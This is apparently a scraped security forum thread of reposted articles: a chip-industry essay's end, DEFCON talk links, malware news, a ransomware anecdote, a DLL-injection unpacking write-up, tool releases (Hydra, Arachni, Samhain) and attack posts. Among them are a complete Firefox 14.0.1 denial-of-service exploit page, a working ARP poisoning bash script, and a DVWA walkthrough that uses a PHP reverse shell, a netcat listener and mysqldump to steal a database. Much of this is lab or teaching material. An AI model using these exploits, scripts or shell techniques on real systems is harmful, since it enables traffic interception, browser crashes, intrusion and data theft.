suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies. This turbulence is now real and visible. The major companies that makeup the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel’s CEO, retired suddenly and unexpectedly, just last month.Intel, in particular, faces a precarious situation. It can harvest its tremendous profits in the PC market for the next several years or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holding’s licensing-based business model. [7] It’s a choice between serving a known, highly profitable market (in the shorter-term) and possibly winning in a comparatively unknown, unprofitable market (in the longer-term). As a professional executive or manager, which option would you choose? Thus we have the innovator’s dilemma.Join the discussion on Hacker News.If you’ve read this far, you should follow me on Twitter.— [1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year. [2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM compatible CPU core for the iPhone 5 and iPad 4. [3] Intel reports having 20 tablets in its pipeline for launch by the end of this year. [4] Intel’s efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, has thus far underperformed expectations. [5] I wasn’t able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market. [6] AMD had net loss in its latest quarter and thus you cannot compute a price to earnings ratio. [7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also have a significant drag on its margins and profitability. Sursa: The End of x86? An Update
  13. [Audio] Issues with security and networked object system From the Hacker Jeopardy winning team. He will discuss Issues with Security and Networked Object Systems, looking at some of the recent security issues found with activeX and detail some of the potentials and problems with network objects. Topics will include development of objects, distributed objects, standards, ActiveX, corba, and hacking objects. Size 23.3 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  14. [Audio] Packet Sniffing He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, bpf) that different platforms provide to allow the hack Size 25.2 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  15. [h=1]Security researchers identify malware infecting U.S. banks[/h] By Lucian Constantin, IDG News Service Dec 22, 2012 12:36 PM Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions. Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post. "Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions." (Also see "How to Avoid Malware.") Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas. Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which seems to suggest that its authors might have targeted specific individuals and organizations, Gutierrez said. The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. Once installed, the Stabuniq Trojan program collects information about the compromised computer, like its name, running processes, OS and service pack version, assigned IP (Internet Protocol) address and sends this information to command-and-control (C&C) servers operated by the attackers. "At this stage we believe the malware authors may simply be gathering information," Gutierrez said. Sursa: Security researchers identify malware infecting U.S. banks | PCWorld
  16. [h=1]The Social Impact of Malware Infections[/h]I just had a good experience today about the “social impact” of malware infections and I would like to share it with you. For most infosec people, it is part of the game to play the fireman for family and friends when they are in trouble with their computer. The term “computer” is used by them as a generic term and includes the hardware, the software, the Internet connectivity, mailboxes, etc. Today it was again my turn to be contacted by a friend who received a “strange message” on his screen. That’s also typical, people see always strange message and even to not try to read and understand them! My wife picked up the call and said that my friend looked very affected and asked to call back asap… I quickly brought with my an emergency toolkit (a BackTrack on USB, some cables, USB sticks, a Windows DVD) and went to the front! Once arrived, my friend was very happy to see me and explained that while surfing on “some websites“, suddenly a message popped up! For me, it did not look like a regular malware infections: they usually try to install themselves and operate silently. My attention was focused on some words while he was describing the problem: “Police“, “They ask money“, “pornographic website“. Ok, it’s a ransomware! I booted the laptop offline to reproduce the malicious behaviour and saw this nice screen: (Click to enlarge) My friend and his wife were really very affected by this message and did not know how to react. They saw this as an intrusion in their private life. Worse, the displayed message referred to visits to child pornography websites! Of course, I was tempted to find the infection vector which was certainly a compromised (or malicious) website. But my goal was also to respect my friend’s privacy. I decided to simply get rid of the malware. Quite easy with one. It’s a common one and just display a pop-up window. There is no file encryption. I just booted in Emergency mode and reverted to the latest valid restore point. Case closed! Then I took some time to discuss with them and I realized how this story affected my friend (and his wife!). The infection happened Saturday evening. He did not sleep, he did not eat at all! He had 24 hours to pay 100 EUR and he spent the night with the following questions in mind: To pay or not to pay? Do I talk about this problem with my wife? But I never visited child pornography websites, how did they find this? Will the police catch me? Come to my house, seize my computer? How to report that I’m not a criminal? Hopefully, he had the good reaction and called me “because I’m working with computers” (like mentioned in the introduction). But not all people know other IT people and could benefit of free support. How will those people address the same kind of issue? His wife also had lot of questions: Does my husband really visit child pornography websites? Can I trust him again? Will the police catch him? Those friends are in couple for years and have a very stable life. Can you imagine the same story in a couple who has already social or financial problems? Or who want to divorce? This could completely change the rules of the game. This story really proves that bad guys are playing with the human behaviour to catch victims! It’s a pity that I did not found the website which delivered the malware to make a deeper analyzis but, once again, it’s my friend’s privacy! Let’s put the social aspect aside now, why he was infected? Hélas, I should say nothing new, regular mistakes: Using the computer with administrator rights Outdated AV No backup It’s amazing (in the right sense of the term) to see how such malwares use the human weaknesses and feelings (stress, shame, ignorance, …) to successfully perform their goal! Anyway, the case of closed for my friend. I’ll just need to continue the awareness trainings from time to time! Sursa: The Social Impact of Malware Infections | /dev/random
  17. [h=3]Using DLL Injection to Automatically Unpack Malware[/h]In this post, I will present DLL injection by means of automatically unpacking malware. But first, the most important question: [h=2]What is DLL Injection and Reasons for Injecting a DLL[/h] DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code good testability, you don't have to reinvent the wheel and do everything on your own. But why should you want to injecting a DLL into a foreign process? There are lots of reasons to inject a DLL. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it in an injected DLL. Some showcases are: creation of cheats, trainers extracting passwords and encryption keys unpacking packed/encrypted executables To me, especially the opportunity of unpacking and decrypting malware is very interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will shortly summarize how it works. [h=3][/h] [h=2]The Malware Packer[/h] In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuously looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not as strong as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it by self-modifying code. In the snippet below, you see how exactly the code is modified. The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code. mov [ebp+var_1], 0F6h mov al, [ebp+var_1] mov ecx, ptr_to_function xor al, 0A1h sub al, 6Eh mov [ecx], al ; =0xE9 mov ecx, ptr_to_function ... mov [ecx+1], eax ; delta to decrypted code ... call eax As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Them it does some relocation (as the base address has changed) and executes the entry point of executable. In the following code excerpt, you can see the generic calculation of the entry point: mov edx, [ebp+newImageBase] mov ecx, [edx+3Ch] ; e_lfanew add ecx, edx ; get PE header ... mov ebx, [ecx+28h] ; get AddressOfEntryPoint add ebx, edx ; add imageBase ... mov [ebp+vaOfEntryPoint], ebx ... mov ebx, [ebp+vaOfEntryPoint] ... call ebx Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero. mov eax, alreadyDecrypted cmp eax, 6E6C82B7h jnz dontInitialize ... mov alreadyDecrypted, 0 dontInitialize: ... In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet: mov [ebp+const_0DF2EF03], 0DF2EF03h mov edi, 75683572h mov esi, 789ADA71h mov eax, [ebp+const_0DF2EF03] mov ecx, alreadyDecrypted xor eax, edi sub eax, esi cmp eax, ecx ; eax = 0 jnz dontDecrypt Once more, you see the obfuscation employed by the packer. Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps: gather chunks of the packed program from the executable memory space BASE64-decode it decompress it write it section by section to the original executable's memory space, effectively overwriting all of the original code fix imports etc. After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Code at the OEP [/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] [h=3]Weaknesses[/h] What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap, but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you can write a static unpacker and perhaps one of my future posts will deal with that. One of the largest weaknesses are the memory allocations and setting the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function and the one setting the appropriate rights to the whole image space really sticks out. After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but both seem not aware that the technique presented in the following is really easily implemented. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only, hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to missing execution rights. So, now that we know the correct location where to break the packer, how to unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple: start the binary in suspended state inject a DLL this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place as backup, a hook on SetErrorMode is set. Hence, when encountering unknown packers, the binary won't be executed for too long. [*]resume the process Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-) It seems not too easy to find a decent DLL injector. Especially, one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector that is capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-) [h=3]Conclusion[/h] The presented technique works very well against the unpacker. So far, I've encountered about 50 samples and almost all can be unpacked using this technique. Furthermore, all unpackers that overwrite the original executable's image space can be unpacked by this technique. In future posts, I will evaluate this technique against other packers. Eingestellt von Sebastian Eschweiler um 03:20 Sursa: Malware Muncher: Using DLL Injection to Automatically Unpack Malware
  18. Disabling Antivirus Program(S) Description: PDF : - https://hacktivity.com/en/downloads/archives/185/ Bachelor’s Degree in Computer Science at Faculty of Software Engineering at College of Nyiregyhaza. He got more than 9 years of experience on the field of it security, mostly in designing and creating security related products like DLP (data lost prevention) solutions and system log collectors. He was a developer of a widely known open source tool syslog-ng. Currently working as an IT security consultant and researcher at the BDO MITM Kft. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Disabling Antivirus Program(S)
  19. File Upload Exploitation File upload vulnerabilities consists a major threat for web applications.A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell.Of course shell is always a goal but a good penetration tester must not stop there.Further activities can be performed after the shell.The focus of these activities must be on the database.In this article we will see how we can obtain a shell from the exploitation of file upload on a Linux web server and how we can dump the database that is running on the system. Backtrack includes a variety of web shells for different technologies like PHP,ASP etc.In our example we will use the damn vulnerable web application which is written in PHP in order to attack the web server through the file upload.The web shell that we will use in our case it will be the php-reverse-shell. uploading the web shell Now we have to set our machine to listen on the same port as our web shell.We can do this with netcat and the command nc -lvp 4444.The next step is to go back to the web application and to try to access the URL that the PHP reverse shell exists.We will notice that it will return a shell to our console: Obtaining a shell So we have compromise the remote web server and we can execute further commands from our shell-like a simple ls in order to discover directories. Listing Directories Now it is time to dump the database.We will have to go to the directory with the name uploads because this directory has write permissions and it is visible to the outside world which means that we can access it and we can create a file.Then we can use the following command in order to dump the database to a file. mysqldump -u root -p dvwa > hacked_db.sql We already know that the user root exists because it is already logged into the system.Also it is very common the name of the application or of the company to be the database name so we will use the dvwa.The > sign will create a file inside the uploads directory with the name hacked_db.sql. Dumping the database to a file As we can see from the image above we had to provide a password.In this scenario we just pressed enter without submitting anything.In a real world penetration test it would be much more difficult however it is always a good practice to try some of the common passwords.The next two images are showing the dump of the dvwa database. Dump of DVWA database Dump of DVWA database 2 From the last image we can see that we even obtain the password hash of the admin which it can be cracked by using a tool like john the ripper.This is also important as we may want to have the admin privileges and into the application. Conclusion In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database.Of course in a real world scenario it is more likely restrictions to be in place but it good to know the methodology and the technique that we must follow once we have managed to upload our web shell. Sursa: File Upload Exploitation
  20. [h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]Author: knowlegend <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FF-14.0.1 DoS-Exploit by Know v3.0</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" /> <script type="text/javascript" language="JavaScript"> var CrashIt = false; if (typeof CrashIt != 'undefined') { CrashIt = new XMLHttpRequest(); } if (!CrashIt) { try { CrashIt = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { CrashIt = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { CrashIt = null; } } } function load() { CrashIt.open('get','bla.php'); CrashIt.onreadystatechange = handleContent; CrashIt.send(null); return false; } function handleContent() { while(CrashIt.readyState != 4) { document.getElementById('inhalt').innerHTML = "pwnd"; } document.getElementById('inhalt').innerHTML = CrashIt.responseText; } </script> </head> <body onload="load();"> <div id="inhalt"></div> <body> </html> # 1337day.com [2012-12-23] Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  21. [h=3]Fast Network cracker Hydra v 7.4[/h] One of the biggest security holes are passwords, as every password security study shows. A very fast network logon cracker which support many different services, THC-Hydra is now updated to 7.4 version Hydra available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, Currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Change Log New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!) Added support for win8 and win2012 server to the RDP module Better target distribution if -M is used Added colored output (needs libcurses) Better library detection for current Cygwin and OS X Fixed the -W option Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested Fixed HTTP Form module false positive when no answer was received from the server Fixed SMB module return code for invalid hours logon and LM auth disabled Fixed http-{get|post-form} from xhydra Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz) Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-) Added debug mode option to usage (thanks to Anold Black) Download THC-Hydra 7.4 Sursa: Fast Network cracker Hydra v 7.4 updated version download - Hacker News , Security updates
  22. Arachni Web Application Security Scanner Framework Web application hacking is very common and there are so many tools that can exploit the web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The vary first step is to find the vulnerabilities on web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install arachni and how to launch your first attack against a web application. DownloadArachni Since I am on Linux backtrack 5 R1 but you can use other Linux distribution like ubuntu. Start the web mode of arachni. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web Now the question is how to edit Dispatchers of Arachni because without dispatchers arachni does not work. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd Now click on the plug ins to choose the best plug ins then click on the module to select and unselected modules depends on your need. Now click on the start scan to run your first scan enter the URL of the target web application then simply start the attack, after sometimes you need to evaluate the report to get the vulnerabilities. Sursa: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  23. Ce e "mc" ala?
  24. [h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below: #!/bin/bash niccard=eth1 if [[ $EUID -ne 0 ]]; then echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n" echo -e "\t\t\t Example: sudo $0 \n" exit 1 else echo -e "\n33[1;32m#######################################" echo -e "# ARP Poison Script #" echo -e "#######################################" echo -e " 33[1;31mCoded By:33[0m Travis Phillips" echo -e " 33[1;31mDate Released:33[0m 03/27/2012" echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m" echo -n "Please enter target's IP: " read victimIP echo -n "Please enter Gateway's IP: " read gatewayIP echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n" echo -e "\t\t--==[Targets]==--" echo -e "\t\tTarget: $victimIP" echo -e "\t\tGateway: $gatewayIP \n\n" echo -e " [*] Enabling IP Forwarding \n" echo "1" > /proc/sys/net/ipv4/ip_forward echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n" xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" & fi ARP poison script Sursa: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/
  25. [h=1]Samhain 3.0.9![/h]by Mayuresh on December 22, 2012 For open source HIDS lovers, we have an updated release of Samhain! It is the bugfixed Samhain version 3.0.9 ! Our original post about Samhain can be found here. Samhain 3.0.9 “The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows).“ Official change log for Samhain 3.0.9: Some build errors have been fixed. The ‘probe’ command for the server has been fixed (clients could be erroneously omitted under certain conditions). An option ‘IgnoreTimestampsOnly’ has been added to the Windows registry check (ignore changes if only timestamp has changed). Full scans requested by the inotify module will now only run at times configured for full scans anyway. [h=3]Download Samhain:[/h] Samhain 3.0.9 – samhain-current.tar.gz/samhain-3.0.9.tar.gz Sursa: Samhain version 3.0.9! — PenTestIT
×
×
  • Create New...